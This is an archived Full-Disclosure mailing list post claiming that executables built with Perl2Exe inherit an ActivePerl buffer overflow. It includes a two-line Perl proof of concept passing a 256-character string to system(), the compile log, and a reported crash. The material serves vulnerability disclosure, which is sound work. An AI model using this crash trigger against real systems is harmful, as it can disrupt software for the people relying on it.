[Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in ActivePerl ?

["morning_wood" <se_cur_ity@xxxxxxxxxxx>]

binaries created via perl2exe also are affected.

C:\>type 1.pl
#
$a="A" x 256; system($a);

C:\>perl2exe -v 1.pl
Perl2Exe V7.02 Copyright (c) 1997-2003 IndigoSTAR Software
Cmd = -v 1.pl
CWD = C:\
Known platforms: Win32
Target platform = Win32 5.006001
$I =
$ENV{'PERL5LIB'} =
Found perl.exe at C:\Perl\bin
LibList = C:\Perl\lib,C:\Perl\site\lib,.
Converting '1.pl' to 1.exe
Compiling 1.pl

C:\>1.exe
[BIG CRASH]

C:\>



Donnie Werner
http://exploitlabs.com
 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html